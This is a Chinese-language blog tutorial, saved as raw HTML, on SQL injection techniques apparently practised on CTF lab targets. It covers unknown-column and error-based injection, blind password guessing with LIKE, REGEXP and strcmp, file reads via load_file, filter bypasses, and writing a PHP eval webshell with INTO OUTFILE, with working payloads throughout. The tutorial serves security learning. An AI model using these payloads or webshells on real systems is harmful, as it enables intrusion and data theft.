<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><title>SQL注入学习笔记2 | 一只小白</title><meta name="description" content="一、未知列名注入未知列名注入一般用于过滤column，通过不需要查询列名的方式来获取数据。 1. union绕过列名payload：id&#x3D;-1 union select 1,a.2,3 from (select 1,2,3 union select * from user limit 1,1)a分析payload要从最里面，最先执行的sql语句开始。先看select 1,2 union selec"><meta name="keywords" content="SQL注入"><meta name="author" content="XiaoPu"><meta name="copyright" content="XiaoPu"><meta name="format-detection" content="telephone=no"><link rel="shortcut icon" href="/img/favicon.ico"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="dns-prefetch" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="https://fonts.googleapis.com" crossorigin="crossorigin"/><link rel="dns-prefetch" href="https://fonts.googleapis.com"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="dns-prefetch" href="//busuanzi.ibruce.info"/><meta name="twitter:card" content="summary"><meta name="twitter:title" content="SQL注入学习笔记2"><meta name="twitter:description" content="一、未知列名注入未知列名注入一般用于过滤column，通过不需要查询列名的方式来获取数据。 1. union绕过列名payload：id&#x3D;-1 union select 1,a.2,3 from (select 1,2,3 union select * from user limit 1,1)a分析payload要从最里面，最先执行的sql语句开始。先看select 1,2 union selec"><meta name="twitter:image" content="https://img.xpctf.cn/img/20200530144523.png"><meta property="og:type" content="article"><meta property="og:title" content="SQL注入学习笔记2"><meta property="og:url" content="https://www.xpctf.cn/posts/d106/"><meta property="og:site_name" content="一只小白"><meta property="og:description" content="一、未知列名注入未知列名注入一般用于过滤column，通过不需要查询列名的方式来获取数据。 1. union绕过列名payload：id&#x3D;-1 union select 1,a.2,3 from (select 1,2,3 union select * from user limit 1,1)a分析payload要从最里面，最先执行的sql语句开始。先看select 1,2 union selec"><meta property="og:image" content="https://img.xpctf.cn/img/20200530144523.png"><meta property="article:published_time" content="2020-07-01T01:44:12.000Z"><meta property="article:modified_time" content="2021-09-02T06:37:35.423Z"><script src="https://cdn.jsdelivr.net/npm/js-cookie/dist/js.cookie.min.js"></script><script>var autoChangeMode = 'false'
var t = Cookies.get("theme")
if (autoChangeMode == '1'){
  var isDarkMode = window.matchMedia("(prefers-color-scheme: dark)").matches
  var isLightMode = window.matchMedia("(prefers-color-scheme: light)").matches
  var isNotSpecified = window.matchMedia("(prefers-color-scheme: no-preference)").matches
  var hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified

  if (t === undefined){
    if (isLightMode) activateLightMode()
    else if (isDarkMode) activateDarkMode()
    else if (isNotSpecified || hasNoSupport){
      console.log('You specified no preference for a color scheme or your browser does not support it. I Schedule dark mode during night time.')
      var now = new Date()
      var hour = now.getHours()
      var isNight = hour < 6 || hour >= 18
      isNight ? activateDarkMode() : activateLightMode()
  }
  } else if (t == 'light') activateLightMode()
  else activateDarkMode()

} else if (autoChangeMode == '2'){
  now = new Date();
  hour = now.getHours();
  isNight = hour < 6 || hour >= 18
  if(t === undefined) isNight? activateDarkMode() : activateLightMode()
  else if (t === 'light') activateLightMode()
  else activateDarkMode() 
} else {
  if ( t == 'dark' ) activateDarkMode()
  else if ( t == 'light') activateLightMode()
}

function activateDarkMode(){
  document.documentElement.setAttribute('data-theme', 'dark')
  if (document.querySelector('meta[name="theme-color"]') !== null){
    document.querySelector('meta[name="theme-color"]').setAttribute('content','#000')
  }
}
function activateLightMode(){
  document.documentElement.setAttribute('data-theme', 'light')
  if (document.querySelector('meta[name="theme-color"]') !== null){
  document.querySelector('meta[name="theme-color"]').setAttribute('content','#fff')
  }
}</script><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css"><link rel="canonical" href="https://www.xpctf.cn/posts/d106/"><link rel="prev" title="易锦靶场新手区SQL注入" href="https://www.xpctf.cn/posts/2f9a/"><link rel="next" title="SQL注入学习笔记1" href="https://www.xpctf.cn/posts/c70/"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Titillium+Web"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"search.xml","languages":{"hits_empty":"找不到您查询的内容:${query}"}},
  translate: {"defaultEncoding":2,"translateDelay":0,"cookieDomain":"https://www.xpctf.cn/","msgToTraditionalChinese":"繁","msgToSimplifiedChinese":"簡"},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  bookmark: {
    message_prev: '按',
    message_next: '键将本页加入书签'
  },
  runtime_unit: '天',
  runtime: true,
  copyright: undefined,
  ClickShowText: undefined,
  medium_zoom: false,
  fancybox: true,
  Snackbar: undefined,
  baiduPush: true,
  highlightCopy: true,
  highlightLang: true,
  highlightShrink: 'false',
  isFontAwesomeV5: false,
  isPhotoFigcaption: true,
  islazyload: false,
  isanchor: true
  
}</script><script>var GLOBAL_CONFIG_SITE = { 
  isPost: true,
  isHome: false,
  isSidebar: true  
  }</script><noscript><style>
#page-header {
  opacity: 1
}
.justified-gallery img{
  opacity: 1
}
</style></noscript><meta name="generator" content="Hexo 5.4.0"></head><body><div id="mobile-sidebar"><div id="menu_mask"></div><div id="mobile-sidebar-menus"><div class="mobile_author_icon"><img class="avatar-img" src="/img/avatar.png" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="mobile_post_data"><div class="mobile_data_item is-center"><div class="mobile_data_link"><a href="/archives/"><div class="headline">文章</div><div class="length_num">48</div></a></div></div><div class="mobile_data_item is-center">      <div class="mobile_data_link"><a href="/tags/"><div class="headline">标签</div><div class="length_num">38</div></a></div></div><div class="mobile_data_item is-center">     <div class="mobile_data_link"><a href="/categories/"><div class="headline">分类</div><div class="length_num">11</div></a></div></div></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fa fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fa fa-archive"></i><span> 归档</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fa fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fa fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fa fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fa fa-heart"></i><span> 关于</span></a></div></div></div></div><i class="fa fa-arrow-right on" id="toggle-sidebar" aria-hidden="true">     </i><div id="sidebar"><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar">     </div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80%E3%80%81%E6%9C%AA%E7%9F%A5%E5%88%97%E5%90%8D%E6%B3%A8%E5%85%A5"><span class="toc-text">一、未知列名注入</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-union%E7%BB%95%E8%BF%87%E5%88%97%E5%90%8D"><span class="toc-text">1. union绕过列名</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-using%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5"><span class="toc-text">2. using报错注入</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#2-1-join%E5%87%BD%E6%95%B0"><span class="toc-text">2.1 join函数</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-2-using-%E5%87%BD%E6%95%B0%E7%94%A8%E6%B3%95"><span class="toc-text">2.2 using 函数用法</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-3-%E5%88%AB%E5%90%8D%E6%9F%A5%E8%AF%A2"><span class="toc-text">2.3 别名查询</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-4-using%E6%8A%A5%E9%94%99"><span class="toc-text">2.4 using报错</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C%E3%80%81OOB%E5%A4%96%E5%B8%A6%E6%B3%A8%E5%85%A5"><span class="toc-text">二、OOB外带注入</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E9%80%9A%E9%85%8D%E7%AC%A6%E6%B3%A8%E5%85%A5"><span class="toc-text">1. 通配符注入</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-1-%E9%80%9A%E9%85%8D%E7%AC%A6"><span class="toc-text">1.1 通配符</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#1-1-like%E5%87%BD%E6%95%B0"><span class="toc-text">1.1 like函数</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#1-2-regex%E5%87%BD%E6%95%B0"><span class="toc-text">1.2 regex函数</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-strcmp%E5%87%BD%E6%95%B0%E6%B3%A8%E5%85%A5"><span class="toc-text">2. strcmp函数注入</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#2-1-strcmp%E5%87%BD%E6%95%B0"><span class="toc-text">2.1 strcmp函数</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-2-strcmp%E6%B3%A8%E5%85%A5"><span class="toc-text">2.2 strcmp注入</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%89%E3%80%81load-file%E8%AF%BB%E6%96%87%E4%BB%B6"><span class="toc-text">三、load_file读文件</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E6%96%87%E4%BB%B6%E6%93%8D%E4%BD%9C%E5%9F%BA%E7%A1%80"><span class="toc-text">1. 文件操作基础</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-1-show%E7%9A%84%E7%94%A8%E6%B3%95"><span class="toc-text">1.1 show的用法</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#1-2-MySQL%E8%AF%BB%E6%96%87%E4%BB%B6"><span class="toc-text">1.2 MySQL读文件</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#1-3-%E6%96%87%E4%BB%B6%E6%93%8D%E4%BD%9C%E5%87%BD%E6%95%B0"><span class="toc-text">1.3 文件操作函数</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-load-file%E8%AF%BB%E6%96%87%E4%BB%B6"><span class="toc-text">2. load_file读文件</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9B%9B%E3%80%81insert-into%E5%86%99%E6%96%87%E4%BB%B6"><span class="toc-text">四、insert_into写文件</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E5%86%99%E6%96%87%E4%BB%B6"><span class="toc-text">1. 写文件</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-1-into-outfile%E5%86%99%E6%96%87%E4%BB%B6"><span class="toc-text">1.1 into outfile写文件</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#1-2-dumpfile%E5%87%BD%E6%95%B0"><span class="toc-text">1.2 dumpfile函数</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E4%B8%A4%E7%A7%8D%E5%88%97%E7%94%A8%E6%96%B9%E5%BC%8F"><span class="toc-text">2. 两种列用方式</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#2-1-%E7%9B%B4%E6%8E%A5%E5%86%99webshell"><span class="toc-text">2.1 直接写webshell</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-2-%E5%88%A9%E7%94%A8%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB"><span class="toc-text">2.2 利用文件包含</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%94%E3%80%81str-replace%E7%BB%95%E8%BF%87"><span class="toc-text">五、str_replace绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E5%8F%8C%E5%86%99%E7%BB%95%E8%BF%87"><span class="toc-text">1. 双写绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-1-str-replace%E5%87%BD%E6%95%B0"><span class="toc-text">1.1 str_replace函数</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#1-2-str-replace%E5%8F%8C%E5%86%99%E7%BB%95%E8%BF%87"><span class="toc-text">1.2 str_replace双写绕过</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E5%8F%8D%E6%96%9C%E6%9D%A0%E7%BB%95%E8%BF%87"><span class="toc-text">2. 反斜杠绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-1-%E5%8F%8D%E6%96%9C%E6%9D%A0"><span class="toc-text">1.1 反斜杠</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#1-2-%E5%8F%8D%E6%96%9C%E6%9D%A0%E7%BB%95%E8%BF%87"><span class="toc-text">1.2 反斜杠绕过</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%85%AD%E3%80%81sqlmap%E4%BD%BF%E7%94%A8"><span class="toc-text">六、sqlmap使用</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-sqlmap%E7%9A%84%E7%8E%AF%E5%A2%83%E4%BB%8B%E7%BB%8D"><span class="toc-text">1. sqlmap的环境介绍</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-sqlmap%E7%9A%84%E4%B8%80%E4%BA%9B%E5%B8%B8%E7%94%A8%E5%8F%82%E6%95%B0"><span class="toc-text">2. sqlmap的一些常用参数</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-%E4%BD%BF%E7%94%A8sqlmap%E5%AE%9E%E7%8E%B0%E6%B3%A8%E5%85%A5"><span class="toc-text">3. 使用sqlmap实现注入</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#3-1-%E6%A3%80%E6%9F%A5%E6%98%AF%E5%90%A6%E5%AD%98%E5%9C%A8sql%E6%B3%A8%E5%85%A5"><span class="toc-text">3.1 检查是否存在sql注入</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3-2-%E6%9F%A5%E8%AF%A2%E6%89%80%E6%9C%89%E6%95%B0%E6%8D%AE%E5%BA%93"><span class="toc-text">3.2 查询所有数据库</span></a></li></ol></li></ol></li></ol></div></div></div><div id="body-wrap"><div class="post-bg" id="nav" style="background-image: url(https://img.xpctf.cn/img/20200530144523.png)"><div id="page-header"><span class="pull_left" id="blog_name"><a class="blog_title" id="site-name" href="/">一只小白</a></span><span class="pull_right menus"><div id="search_button"><a class="site-page social-icon search"><i class="fa fa-search fa-fw"></i><span> 搜索</span></a></div><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fa fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fa fa-archive"></i><span> 归档</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fa fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fa fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fa fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fa fa-heart"></i><span> 关于</span></a></div></div><span class="toggle-menu close"><a class="site-page"><i class="fa fa-bars fa-fw" aria-hidden="true"></i></a></span></span></div><div id="post-info"><div id="post-title"><div class="posttitle">SQL注入学习笔记2</div></div><div id="post-meta"><div class="meta-firstline"><time class="post-meta__date"><span class="post-meta__date-created" title="发表于 2020-07-01 09:44:12"><i class="fa fa-calendar" aria-hidden="true"></i> 发表于 2020-07-01</span><span class="post-meta__separator">|</span><span class="post-meta__date-updated" title="更新于 2021-09-02 14:37:35"><i class="fa fa-history" aria-hidden="true"></i> 更新于 2021-09-02</span></time><span class="post-meta__categories"><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/Web/">Web</a></span></div><div class="meta-secondline"> <span class="post-meta-wordcount"><i class="post-meta__icon fa fa-file-word-o" aria-hidden="true"></i><span>字数总计:</span><span class="word-count">2.1k</span><span class="post-meta__separator">|</span><i class="post-meta__icon fa fa-clock-o" aria-hidden="true"></i><span>阅读时长: 8 分钟</span></span></div><div class="meta-thirdline"><span class="post-meta-pv-cv"><span class="post-meta__separator">|</span><i class="fa fa-eye post-meta__icon" aria-hidden="true"> </i><span>阅读量:</span><span id="busuanzi_value_page_pv"></span></span><span class="post-meta-commentcount"></span></div></div></div></div><main class="layout_post" id="content-inner"><article id="post"><div class="post-content" id="article-container"><h2 id="一、未知列名注入"><a href="#一、未知列名注入" class="headerlink" title="一、未知列名注入"></a>一、未知列名注入</h2><p>未知列名注入一般用于过滤column，通过不需要查询列名的方式来获取数据。</p>
<h3 id="1-union绕过列名"><a href="#1-union绕过列名" class="headerlink" title="1. union绕过列名"></a>1. union绕过列名</h3><p>payload：<code>id=-1 union select 1,a.2,3 from (select 1,2,3 union select * from user limit 1,1)a</code><br>分析payload要从最里面，最先执行的sql语句开始。<br>先看<code>select 1,2 union select * from flag</code>，该语句的执行效果如下<br><img src="https://img.xpctf.cn/img/20200701115547.png" alt="">表名变成是1，2，3 但我们要怎么获取到里面的数据呢，看第一个union查询的<code>a.2</code>，它派生表的别名，<code>.2</code>是第二个表，也就是user表的username列，<code>a.2</code>相当于查询了username列名。</p>
<h3 id="2-using报错注入"><a href="#2-using报错注入" class="headerlink" title="2. using报错注入"></a>2. using报错注入</h3><p>使用场景：未知列名<br>使用条件：报错回显</p>
<h4 id="2-1-join函数"><a href="#2-1-join函数" class="headerlink" title="2.1 join函数"></a>2.1 join函数</h4><p>join函数 用于把两个表连接起来，join on是把满足条件的连接起来。<br>join用法：select * from user join flag;</p>
<h4 id="2-2-using-函数用法"><a href="#2-2-using-函数用法" class="headerlink" title="2.2 using 函数用法"></a>2.2 using 函数用法</h4><p>using函数 和join函数组合使用，作用是过来相同列<br>用法：select * from user join flag using(id);</p>
<h4 id="2-3-别名查询"><a href="#2-3-别名查询" class="headerlink" title="2.3 别名查询"></a>2.3 别名查询</h4><p>原理：使用别名的时候，不允许出现相同的列名。<br>select 1,1;    可以执行，不报错<br>select * from (select 1,1)a;    报错</p>
<h4 id="2-4-using报错"><a href="#2-4-using报错" class="headerlink" title="2.4 using报错"></a>2.4 using报错</h4><p>根据别名查询不能存在相同列名的特性，我们可以构造相同列名来爆出列名。<br>payload：<code>select * from (select * from user as a join user as b)c;</code><br>这样即可爆出第一个相同的列名，使用using组合已知列名即可爆出其他列名。<br>payload：<code>select * from (select * from user as a join user as b using(id,username))c;</code><br>多个列名使用逗号分隔，在using函数内。</p>
<h2 id="二、OOB外带注入"><a href="#二、OOB外带注入" class="headerlink" title="二、OOB外带注入"></a>二、OOB外带注入</h2><h3 id="1-通配符注入"><a href="#1-通配符注入" class="headerlink" title="1. 通配符注入"></a>1. 通配符注入</h3><h4 id="1-1-通配符"><a href="#1-1-通配符" class="headerlink" title="1.1 通配符"></a>1.1 通配符</h4><p>在MySQL中搜索数据时，可以使用通配符代替多个字符，通配符必须和like一起使用。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">%		代替一个或多个字符</span><br><span class="line">_		仅代替一个字符</span><br></pre></td></tr></table></figure>

<h4 id="1-1-like函数"><a href="#1-1-like函数" class="headerlink" title="1.1 like函数"></a>1.1 like函数</h4><p>like函数 主要用于在where语句中搜索指定的匹配模式。<br>用法：select * from user where username like ‘a%’;<br>payload：<code>password=admin&amp;username=1&#39; or 1=1 and password like &#39;i%&#39;%23</code><br>前提知道admin，如果存在注入，可以使用like猜密码。</p>
<h4 id="1-2-regex函数"><a href="#1-2-regex函数" class="headerlink" title="1.2 regex函数"></a>1.2 regex函数</h4><p>正则表的是，又称规则表达式。（regex、regexp或re），计算机科学的一个概念。正则表达式通常被用来检索、替换那些符合某个模式（规则）的文本。<br>实例：<code>select * from user where username regexp &#39;^a&#39;;</code><br>匹配username列里已a开头的列。<br>payload：<code>password=admin&amp;username=1&#39; or 1=1 and password regexp &#39;^i&#39;%23</code></p>
<h3 id="2-strcmp函数注入"><a href="#2-strcmp函数注入" class="headerlink" title="2. strcmp函数注入"></a>2. strcmp函数注入</h3><h4 id="2-1-strcmp函数"><a href="#2-1-strcmp函数" class="headerlink" title="2.1 strcmp函数"></a>2.1 strcmp函数</h4><p>strcmp函数 用于比较两个字符串的大小。<br>用法：select strcmp(‘a’,’b’);<br>当字符串相等时，返回0；当参数1大于参数2时，返回1；当参数1小于参数2时，返回-1。</p>
<h4 id="2-2-strcmp注入"><a href="#2-2-strcmp注入" class="headerlink" title="2.2 strcmp注入"></a>2.2 strcmp注入</h4><p>payload：<code>password=admin&amp;username=admin&#39;  and (strcmp((ascii(substr(password,1,1))),54))%23</code><br>当猜对时，strcmp返回0,经过and运算为假，所以返回账号密码错误。<br>当猜错时，不论strcmp返回-1还是1，再经过and运算后都是1，所以是密码错误。</p>
<h2 id="三、load-file读文件"><a href="#三、load-file读文件" class="headerlink" title="三、load_file读文件"></a>三、load_file读文件</h2><h3 id="1-文件操作基础"><a href="#1-文件操作基础" class="headerlink" title="1. 文件操作基础"></a>1. 文件操作基础</h3><h4 id="1-1-show的用法"><a href="#1-1-show的用法" class="headerlink" title="1.1 show的用法"></a>1.1 show的用法</h4><p>show databases;    查看所有数据库<br>show tables;    查看当前数据库的所有表<br>show variables;        查看系统变量<br>show variables like ‘sec%’;    使用like限制或者模糊查询</p>
<h4 id="1-2-MySQL读文件"><a href="#1-2-MySQL读文件" class="headerlink" title="1.2 MySQL读文件"></a>1.2 MySQL读文件</h4><p>MySQL新版本增加了一个secure_file_priv选项，用来读取文件进行限制。<br>secure_file_priv参数是用来限制load data,select……outfile,adn load_file()传到那个目录的。<br>当secure_file_peiv值为null时，表示MySQL不允许导入导出。<br>当secure_file_peiv值为/tmp时，表示MySQL只允许在/tmp目录导入导出<br>当secure_file_priv没有值时，表示MySQL对导入导出没有限制<br>开启方式，windows在my.ini中添加<code>secure_file_priv =</code>,linux在my.cnf中添加<code>secure_file_priv =</code>即可。</p>
<h4 id="1-3-文件操作函数"><a href="#1-3-文件操作函数" class="headerlink" title="1.3 文件操作函数"></a>1.3 文件操作函数</h4><p>load_file() 读取文件内容，返回一个字符串，文件必须位于服务器本地，必须使用绝对路径，并且对文件有操作权限，文件内容必须小于max_allowed_packet。注意：目录直接的区分使用/ 不能使用<br>实例：<code>select load_file(&#39;/www/wwwroot/web/7/6/flag.txt&#39;);</code></p>
<h3 id="2-load-file读文件"><a href="#2-load-file读文件" class="headerlink" title="2. load_file读文件"></a>2. load_file读文件</h3><p>payload：<code>password=admin&amp;username=&#39; union select 1,load_file(&#39;/www/wwwroot/web/7/6/flag.txt&#39;),3%23</code><br>load_file必须放在回显位。</p>
<h2 id="四、insert-into写文件"><a href="#四、insert-into写文件" class="headerlink" title="四、insert_into写文件"></a>四、insert_into写文件</h2><h3 id="1-写文件"><a href="#1-写文件" class="headerlink" title="1. 写文件"></a>1. 写文件</h3><h4 id="1-1-into-outfile写文件"><a href="#1-1-into-outfile写文件" class="headerlink" title="1.1 into outfile写文件"></a>1.1 into outfile写文件</h4><p>into outfile函数 用于把数据导出到一个文件中。<br>into outfile的用法：select [column_name] from [table_name] into outfile [path];<br>限制条件：和load_file一样，受到seccure_file_priv的限制；path要使用/并且是绝对路径<br>写一句话：<code>select &#39;&lt;?php @eval($_POST[1]);?&gt;&#39; into outfile &#39;/www/wwwroot/web/7/7/value.php&#39;;</code></p>
<h4 id="1-2-dumpfile函数"><a href="#1-2-dumpfile函数" class="headerlink" title="1.2 dumpfile函数"></a>1.2 dumpfile函数</h4><p>dumpfile函数 也是用于把数据导入到一个文件中，限制一行。<br>dumpfile用法：select [column_name] from [table_name] where id=1 into dumpfile [path];<br>限制条件：和load_file一样，受到seccure_file_priv的限制；path要使用/并且是绝对路径<br>写一句话：<code>select &#39;&lt;?php @eval($_POST[1]);?&gt;&#39; into dumpfile &#39;/www/wwwroot/web/7/7/value.php&#39;;</code></p>
<h3 id="2-两种列用方式"><a href="#2-两种列用方式" class="headerlink" title="2. 两种列用方式"></a>2. 两种列用方式</h3><h4 id="2-1-直接写webshell"><a href="#2-1-直接写webshell" class="headerlink" title="2.1 直接写webshell"></a>2.1 直接写webshell</h4><p>写webshell：<code>password=admin&amp;username=dir&#39; union select 1,2,&quot;&lt;?php @eval($_GET[&#39;dir&#39;]);?&gt;&quot; into outfile &#39;/www/wwwroot/web/7/7/1.php&#39;%23</code><br>读取flag：<code>dir=readfile(&#39;flag.txt&#39;);</code></p>
<h4 id="2-2-利用文件包含"><a href="#2-2-利用文件包含" class="headerlink" title="2.2 利用文件包含"></a>2.2 利用文件包含</h4><p>使用场景：MySQL对文件读写做了限制，只允许在指定文件读写。<br>使用要求：当服务器存在文件包含漏洞时，可以利用文件包含+写文件来getshell</p>
<h2 id="五、str-replace绕过"><a href="#五、str-replace绕过" class="headerlink" title="五、str_replace绕过"></a>五、str_replace绕过</h2><h3 id="1-双写绕过"><a href="#1-双写绕过" class="headerlink" title="1. 双写绕过"></a>1. 双写绕过</h3><h4 id="1-1-str-replace函数"><a href="#1-1-str-replace函数" class="headerlink" title="1.1 str_replace函数"></a>1.1 str_replace函数</h4><p>str_replace是一个php函数，主要用于替换字符串。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">//把5替换为空</span></span><br><span class="line"><span class="variable">$str</span> = <span class="string">&#x27;123456&#x27;</span>;</span><br><span class="line"><span class="variable">$str</span> = str_replace(<span class="string">&#x27;5&#x27;</span>,<span class="string">&#x27;&#x27;</span>,<span class="variable">$str</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$str</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h4 id="1-2-str-replace双写绕过"><a href="#1-2-str-replace双写绕过" class="headerlink" title="1.2 str_replace双写绕过"></a>1.2 str_replace双写绕过</h4><p>双写绕过一般是str_replace 出现了替换为空的情况因为str_replace是单次替换，不会在替换了一次之后，重新检查字符串能不能在被替换。<br>$username = str_replace(‘union’,’’,$username);<br>针对这种方法，就可以利用username=ununionion 这样的形式来绕过。<br>payload：<code>password=admin&amp;username=&#39;ununionion selselectect 1,2,3%23</code><br>SQL语句：<code>select * from user where username=&#39;&#39;union select 1,2,3#&#39;and password=&#39;admin&#39;;</code></p>
<h3 id="2-反斜杠绕过"><a href="#2-反斜杠绕过" class="headerlink" title="2. 反斜杠绕过"></a>2. 反斜杠绕过</h3><h4 id="1-1-反斜杠"><a href="#1-1-反斜杠" class="headerlink" title="1.1 反斜杠"></a>1.1 反斜杠</h4><p>\反斜杠用于把特殊字符转义为普通字符，比如’在sql中是闭合的作用，如果加上&#39;那他就是一个单引号，而不是闭合符号。</p>
<h4 id="1-2-反斜杠绕过"><a href="#1-2-反斜杠绕过" class="headerlink" title="1.2 反斜杠绕过"></a>1.2 反斜杠绕过</h4><p>$username=str_replace(“‘“, ‘\&#39;‘, “admin’”);<br>最后运行的是：admin&#39;    这样单引号就失去了闭合的作用，被当成了普通符号，这时候我们手动加一个反斜杠，这时被替换成admin\\‘，1 3个反斜杠转义了2 4个反斜杠，所有单引号就能跳出来。<br>payload：<code>password=admin&amp;username=\&#39;union select 1,2,3%23</code><br>SQL语句：<code>select * from user where username=&#39;\\&#39;union select 1,2,3#&#39;and password=&#39;admin&#39;;</code></p>
<h2 id="六、sqlmap使用"><a href="#六、sqlmap使用" class="headerlink" title="六、sqlmap使用"></a>六、sqlmap使用</h2><p>参考：<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/2746">sqlmap自带绕过脚本tamper</a></p>
<h3 id="1-sqlmap的环境介绍"><a href="#1-sqlmap的环境介绍" class="headerlink" title="1. sqlmap的环境介绍"></a>1. sqlmap的环境介绍</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">.git			git代码管理残酷</span><br><span class="line">doc				包含sqlmap的具体使用说明</span><br><span class="line">xml				payload目录</span><br><span class="line">shell			包含多种语言的shell，当作注入成功后，就可以使用shell来连接远程服务器</span><br><span class="line">waf				常见的防火前特征</span><br><span class="line">tamper			包含一些常见的的waf绕过脚本</span><br></pre></td></tr></table></figure>
